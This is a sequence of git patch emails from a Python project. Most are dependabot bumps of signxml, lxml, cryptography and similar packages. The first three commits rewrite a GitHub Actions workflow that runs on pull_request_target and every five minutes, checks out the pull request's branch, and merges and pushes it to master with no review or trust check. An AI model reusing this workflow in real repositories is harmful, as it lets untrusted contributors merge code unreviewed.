Aug 2024 19:51:16 -0500 Subject: [PATCH 048/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 3fea27e..2f2824c 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -8,14 +8,25 @@ on: jobs: - auto-update-and-merge: + auto-merge: runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v4.1.7 with: - fetch-depth: 0 + fetch-depth: 0 # Fetch all history for merging + ref: ${{ github.event.pull_request.head.ref }} # Checkout the PR's branch + - name: Merge PR into master + run: | + git config --global user.name 'github-actions[bot]' + git config --global user.email 'github-actions[bot]@users.noreply.github.com' + git checkout master + git pull origin master # Ensure master is up-to-date + git merge ${{ github.event.pull_request.head.ref }} --no-ff # Merge the PR's branch + + - name: Push changes + run: git push origin master - name: Auto-merge pull requests (with caution!) uses: ridedott/merge-me-action@v2.10.93 From 7fb9fd9aa655d65cb0ebfeae4907ccb2d5de9d97 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:53:07 -0500 Subject: [PATCH 049/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 2f2824c..a6c660d 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -27,10 +27,3 @@ jobs: - name: Push changes run: git push origin master - - - name: Auto-merge pull requests (with caution!) - uses: ridedott/merge-me-action@v2.10.93 - with: - GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} - MERGE_METHOD: MERGE - # Add conditions or checks here to control which PRs are auto-merged From 318c390d36054193fed4e39d1ba6e8772347a9c8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:59:45 -0500 Subject: [PATCH 050/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index a6c660d..e0f5cf6 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -1,6 +1,8 @@ name: Auto Update and Merge on: + schedule: + - cron: '*/5 * * * *' # Run every 5 minutes pull_request_target: types: [assigned, unassigned, labeled, unlabeled, opened, edited, reopened, synchronize, ready_for_review, locked, unlocked, review_requested, review_request_removed, auto_merge_enabled, auto_merge_disabled] branches: From 25ba45bea150284caafea48e72251e8c8b09eba7 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 12 Aug 2024 08:13:28 +0000 Subject: [PATCH 051/106] Bump lxml from 5.2.2 to 5.3.0 Bumps [lxml](https://github.com/lxml/lxml) from 5.2.2 to 5.3.0. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-5.2.2...lxml-5.3.0) --- updated-dependencies: - dependency-name: lxml dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 7176312..8055c26 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==43.0.0 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==5.2.2 +lxml==5.3.0 pyasn1==0.6.0 pyOpenSSL==24.2.1 pycparser==2.22 From 53149ebd4b8c1e3403f9e1d5c36cd41d0300cd6d Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 22 Aug 2024 08:52:14 +0000 Subject: [PATCH 052/106] Bump signxml from 3.2.2 to 4.0.0 Bumps [signxml](https://github.com/kislyuk/signxml) from 3.2.2 to 4.0.0. - [Release notes](https://github.com/kislyuk/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/develop/Changes.rst) - [Commits](https://github.com/kislyuk/signxml/compare/v3.2.2...v4.0.0) --- updated-dependencies: - dependency-name: signxml dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 8055c26..20402e6 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==5.3.0 pyasn1==0.6.0 pyOpenSSL==24.2.1 pycparser==2.22 -signxml==3.2.2 +signxml==4.0.0 six==1.16.0 From 6c70c5050d991668a4144e3eb8bd172938a2ae54 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 30 Aug 2024 08:53:58 +0000 Subject: [PATCH 053/106] Bump certifi from 2024.7.4 to 2024.8.30 Bumps [certifi](https://github.com/certifi/python-certifi) from 2024.7.4 to 2024.8.30. - [Commits](https://github.com/certifi/python-certifi/compare/2024.07.04...2024.08.30) --- updated-dependencies: - dependency-name: certifi dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 20402e6..0f84716 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2024.7.4 +certifi==2024.8.30 cffi==1.17.0 cryptography==43.0.0 defusedxml==0.7.1 From 9571356c8cb756cfc74a5419a2434686b76826ef Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 2 Sep 2024 08:49:39 +0000 Subject: [PATCH 054/106] Bump signxml from 4.0.0 to 4.0.1 Bumps [signxml](https://github.com/kislyuk/signxml) from 4.0.0 to 4.0.1. - [Release notes](https://github.com/kislyuk/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/develop/Changes.rst) - [Commits](https://github.com/kislyuk/signxml/compare/v4.0.0...v4.0.1) --- updated-dependencies: - dependency-name: signxml dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 0f84716..ad8139f 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==5.3.0 pyasn1==0.6.0 pyOpenSSL==24.2.1 pycparser==2.22 -signxml==4.0.0 +signxml==4.0.1 six==1.16.0 From 87a915c5fe887d377d9428cd94559e6bde48dcb9 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 4 Sep 2024 00:35:09 +0000 Subject: [PATCH 055/106] Bump cryptography from 43.0.0 to 43.0.1 in the pip group Bumps the pip group with 1 update: [cryptography](https://github.com/pyca/cryptography). Updates `cryptography` from 43.0.0 to 43.0.1 - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/43.0.0...43.0.1) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production dependency-group: pip ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index ad8139f..83f5800 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2024.8.30 cffi==1.17.0 -cryptography==43.0.0 +cryptography==43.0.1 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 634bde389abf570944c39639291e946531c1f618 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 5 Sep 2024 08:59:16 +0000 Subject: [PATCH 056/106] Bump cffi from 1.17.0 to 1.17.1 Bumps [cffi](https://github.com/python-cffi/cffi) from 1.17.0 to 1.17.1. - [Release notes](https://github.com/python-cffi/cffi/releases) - [Commits](https://github.com/python-cffi/cffi/compare/v1.17.0...v1.17.1) --- updated-dependencies: - dependency-name: cffi dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 83f5800..8ef9b8e 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,6 @@ asn1crypto==1.5.1 certifi==2024.8.30 -cffi==1.17.0 +cffi==1.17.1 cryptography==43.0.1 defusedxml==0.7.1 eight==1.0.1 From 09c354983108e9e3d359a21b89418c14d5af3a75 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 11 Sep 2024 08:41:17 +0000 Subject: [PATCH 057/106] Bump pyasn1 from 0.6.0 to 0.6.1 Bumps [pyasn1](https://github.com/pyasn1/pyasn1) from 0.6.0 to 0.6.1. - [Release notes](https://github.com/pyasn1/pyasn1/releases) - [Changelog](https://github.com/pyasn1/pyasn1/blob/main/CHANGES.rst) - [Commits](https://github.com/pyasn1/pyasn1/compare/v0.6.0...v0.6.1) --- updated-dependencies: - dependency-name: pyasn1 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 8ef9b8e..5033f60 100644 --- a/requirements.txt +++ b/requirements.txt @@ -6,7 +6,7 @@ defusedxml==0.7.1 eight==1.0.1 future==1.0.0 lxml==5.3.0 -pyasn1==0.6.0 +pyasn1==0.6.1 pyOpenSSL==24.2.1 pycparser==2.22 signxml==4.0.1 From 7e2225c03d086b6d3a002706b3a36c1daf51b13b Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 11 Sep 2024 08:41:21 +0000 Subject: [PATCH 058/106] Bump signxml from 4.0.1 to 4.0.2 Bumps [signxml](https://github.com/kislyuk/signxml) from 4.0.1 to 4.0.2. - [Release notes](https://github.com/kislyuk/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/develop/Changes.rst) - [Commits](https://github.com/kislyuk/signxml/compare/v4.0.1...v4.0.2) --- updated-dependencies: - dependency-name: signxml dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 8ef9b8e..66ffd77 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==5.3.0 pyasn1==0.6.0 pyOpenSSL==24.2.1 pycparser==2.22 -signxml==4.0.1 +signxml==4.0.2 six==1.16.0 From e616963c7c7bc2139cb10c39aa3f294600e0e263 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 21 Oct 2024 08:33:32 +0000 Subject: [PATCH 059/106] Bump cryptography from 43.0.1 to 43.0.3 Bumps [cryptography](https://github.com/pyca/cryptography) from 43.0.1 to 43.0.3. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/43.0.1...43.0.3) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 2759dc5..21fd927 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2024.8.30 cffi==1.17.1 -cryptography==43.0.1 +cryptography==43.0.3 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From fc2785c6cd2a03ff2a4973601204652f45384658 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 25 Nov 2024 08:37:27 +0000 Subject: [PATCH 060/106] Bump signxml from 4.0.2 to 4.0.3 Bumps [signxml](https://github.com/kislyuk/signxml) from 4.0.2 to 4.0.3. - [Release notes](https://github.com/kislyuk/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/develop/Changes.rst) - [Commits](https://github.com/kislyuk/signxml/compare/v4.0.2...v4.0.3) --- updated-dependencies: - dependency-name: signxml dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 21fd927..8d08c90 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==5.3.0 pyasn1==0.6.1 pyOpenSSL==24.2.1 pycparser==2.22 -signxml==4.0.2 +signxml==4.0.3 six==1.16.0 From 55c4f0f786a36d50f3481d40a52a961dff1b5d98 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 28 Nov 2024 08:49:33 +0000 Subject: [PATCH 061/106] Bump cryptography from 43.0.3 to 44.0.0 Bumps [cryptography](https://github.com/pyca/cryptography) from 43.0.3 to 44.0.0. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/43.0.3...44.0.0) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 8d08c90..3ab5a4a 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2024.8.30 cffi==1.17.1 -cryptography==43.0.3 +cryptography==44.0.0 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 8f64fea3eb1816ff645abbcab2eb56fe37b4d015 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 28 Nov 2024 08:49:37 +0000 Subject: [PATCH 062/106] Bump pyopenssl from 24.2.1 to 24.3.0 Bumps [pyopenssl](https://github.com/pyca/pyopenssl) from 24.2.1 to 24.3.0. - [Changelog](https://github.com/pyca/pyopenssl/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/pyopenssl/compare/24.2.1...24.3.0) --- updated-dependencies: - dependency-name: pyopenssl dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 8d08c90..d4bca55 100644 --- a/requirements.txt +++ b/requirements.txt @@ -7,7 +7,7 @@ eight==1.0.1 future==1.0.0 lxml==5.3.0 pyasn1==0.6.1 -pyOpenSSL==24.2.1 +pyOpenSSL==24.3.0 pycparser==2.22 signxml==4.0.3 six==1.16.0 From 5989cca6e42c8644b6eafaa39a71460abb82058b Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 5 Dec 2024 09:03:22 +0000 Subject: [PATCH 063/106] Bump six from 1.16.0 to 1.17.0 Bumps [six](https://github.com/benjaminp/six) from 1.16.0 to 1.17.0. - [Changelog](https://github.com/benjaminp/six/blob/main/CHANGES) - [Commits](https://github.com/benjaminp/six/compare/1.16.0...1.17.0) --- updated-dependencies: - dependency-name: six dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 9719d69..f1b220b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -10,4 +10,4 @@ pyasn1==0.6.1 pyOpenSSL==24.3.0 pycparser==2.22 signxml==4.0.3 -six==1.16.0 +six==1.17.0 From fef53623aec9d9c2abfa55912a99a4dbe6249225 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Dec 2024 08:43:03 +0000 Subject: [PATCH 064/106] Bump certifi from 2024.8.30 to 2024.12.14 Bumps [certifi](https://github.com/certifi/python-certifi) from 2024.8.30 to 2024.12.14. - [Commits](https://github.com/certifi/python-certifi/compare/2024.08.30...2024.12.14) --- updated-dependencies: - dependency-name: certifi dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index f1b220b..8219595 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2024.8.30 +certifi==2024.12.14 cffi==1.17.1 cryptography==44.0.0 defusedxml==0.7.1 From 9ef6026a71e7c82c2c876f056c3ff22a8869bc5d Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 13 Jan 2025 08:20:16 +0000 Subject: [PATCH 065/106] Bump pyopenssl from 24.3.0 to 25.0.0 Bumps [pyopenssl](https://github.com/pyca/pyopenssl) from 24.3.0 to 25.0.0. - [Changelog](https://github.com/pyca/pyopenssl/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/pyopenssl/compare/24.3.0...25.0.0) --- updated-dependencies: - dependency-name: pyopenssl dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 8219595..38a5df5 100644 --- a/requirements.txt +++ b/requirements.txt @@ -7,7 +7,7 @@ eight==1.0.1 future==1.0.0 lxml==5.3.0 pyasn1==0.6.1 -pyOpenSSL==24.3.0 +pyOpenSSL==25.0.0 pycparser==2.22 signxml==4.0.3 six==1.17.0 From 13847edc092b52ae9d9c3b726720e5f2893b6047 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 31 Jan 2025 08:58:34 +0000 Subject: [PATCH 066/106] Bump certifi from 2024.12.14 to 2025.1.31 Bumps [certifi](https://github.com/certifi/python-certifi) from 2024.12.14 to 2025.1.31. - [Commits](https://github.com/certifi/python-certifi/compare/2024.12.14...2025.01.31) --- updated-dependencies: - dependency-name: certifi dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 38a5df5..2c37b4d 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2024.12.14 +certifi==2025.1.31 cffi==1.17.1 cryptography==44.0.0 defusedxml==0.7.1 From d3ca86119670f6747d1f30e322bd5146e53dd770 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 10 Feb 2025 08:53:30 +0000 Subject: [PATCH 067/106] Bump lxml from 5.3.0 to 5.3.1 Bumps [lxml](https://github.com/lxml/lxml) from 5.3.0 to 5.3.1. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-5.3.0...lxml-5.3.1) --- updated-dependencies: - dependency-name: lxml dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 2c37b4d..f9feb09 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==44.0.0 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==5.3.0 +lxml==5.3.1 pyasn1==0.6.1 pyOpenSSL==25.0.0 pycparser==2.22 From ee8d58b80d59744b281ae9a3ccf256d1af8f9b89 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 11 Feb 2025 19:26:17 +0000 Subject: [PATCH 068/106] Bump cryptography from 44.0.0 to 44.0.1 in the pip group Bumps the pip group with 1 update: [cryptography](https://github.com/pyca/cryptography). Updates `cryptography` from 44.0.0 to 44.0.1 - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/44.0.0...44.0.1) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production dependency-group: pip ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index f9feb09..339a2ed 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2025.1.31 cffi==1.17.1 -cryptography==44.0.0 +cryptography==44.0.1 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 744158bfbacecb7105e8546736e89b2164091803 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 3 Mar 2025 08:46:20 +0000 Subject: [PATCH 069/106] Bump cryptography from 44.0.1 to 44.0.2 Bumps [cryptography](https://github.com/pyca/cryptography) from 44.0.1 to 44.0.2. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/44.0.1...44.0.2) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 339a2ed..268a8d5 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2025.1.31 cffi==1.17.1 -cryptography==44.0.1 +cryptography==44.0.2 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 178be1bb46ef295a69c669fb51786be2f37e825c Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 7 Apr 2025 08:55:17 +0000 Subject: [PATCH 070/106] Bump lxml from 5.3.1 to 5.3.2 Bumps [lxml](https://github.com/lxml/lxml) from 5.3.1 to 5.3.2. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-5.3.1...lxml-5.3.2) --- updated-dependencies: - dependency-name: lxml dependency-version: 5.3.2 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 268a8d5..849bf3b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==44.0.2 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==5.3.1 +lxml==5.3.2 pyasn1==0.6.1 pyOpenSSL==25.0.0 pycparser==2.22 From 3ad991e0ee9aab5e877666488e65345d600c89bc Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 23 Apr 2025 08:35:59 +0000 Subject: [PATCH 071/106] Bump lxml from 5.3.2 to 5.4.0 Bumps [lxml](https://github.com/lxml/lxml) from 5.3.2 to 5.4.0. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-5.3.2...lxml-5.4.0) --- updated-dependencies: - dependency-name: lxml dependency-version: 5.4.0 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 849bf3b..d4ee717 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==44.0.2 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==5.3.2 +lxml==5.4.0 pyasn1==0.6.1 pyOpenSSL==25.0.0 pycparser==2.22 From 7c61952c21cc9f1f4837990cf7ede7dc3b759042 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 28 Apr 2025 11:15:20 +0000 Subject: [PATCH 072/106] Bump certifi from 2025.1.31 to 2025.4.26 Bumps [certifi](https://github.com/certifi/python-certifi) from 2025.1.31 to 2025.4.26. - [Commits](https://github.com/certifi/python-certifi/compare/2025.01.31...2025.04.26) --- updated-dependencies: - dependency-name: certifi dependency-version: 2025.4.26 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index d4ee717..a2b81b0 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2025.1.31 +certifi==2025.4.26 cffi==1.17.1 cryptography==44.0.2 defusedxml==0.7.1 From f698502ce8be6201507d62d29d4368d5875e007d Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 5 May 2025 08:59:01 +0000 Subject: [PATCH 073/106] Bump cryptography from 44.0.2 to 44.0.3 Bumps [cryptography](https://github.com/pyca/cryptography) from 44.0.2 to 44.0.3. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/44.0.2...44.0.3) --- updated-dependencies: - dependency-name: cryptography dependency-version: 44.0.3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a2b81b0..9a4073c 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2025.4.26 cffi==1.17.1 -cryptography==44.0.2 +cryptography==44.0.3 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 985532a875db8aa492d67b61d42d6d7aafc914d4 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 19 May 2025 08:57:22 +0000 Subject: [PATCH 074/106] Bump cryptography from 44.0.3 to 45.0.2 Bumps [cryptography](https://github.com/pyca/cryptography) from 44.0.3 to 45.0.2. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/44.0.3...45.0.2) --- updated-dependencies: - dependency-name: cryptography dependency-version: 45.0.2 dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 9a4073c..f1e7b64 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2025.4.26 cffi==1.17.1 -cryptography==44.0.3 +cryptography==45.0.2 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From e7edccfae9669a593d81f68b9be5161f45c7ef8f Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 19 May 2025 09:00:15 +0000 Subject: [PATCH 075/106] Bump pyopenssl from 25.0.0 to 25.1.0 Bumps [pyopenssl](https://github.com/pyca/pyopenssl) from 25.0.0 to 25.1.0. - [Changelog](https://github.com/pyca/pyopenssl/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/pyopenssl/compare/25.0.0...25.1.0) --- updated-dependencies: - dependency-name: pyopenssl dependency-version: 25.1.0 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 9a4073c..30dab32 100644 --- a/requirements.txt +++ b/requirements.txt @@ -7,7 +7,7 @@ eight==1.0.1 future==1.0.0 lxml==5.4.0 pyasn1==0.6.1 -pyOpenSSL==25.0.0 +pyOpenSSL==25.1.0 pycparser==2.22 signxml==4.0.3 six==1.17.0 From 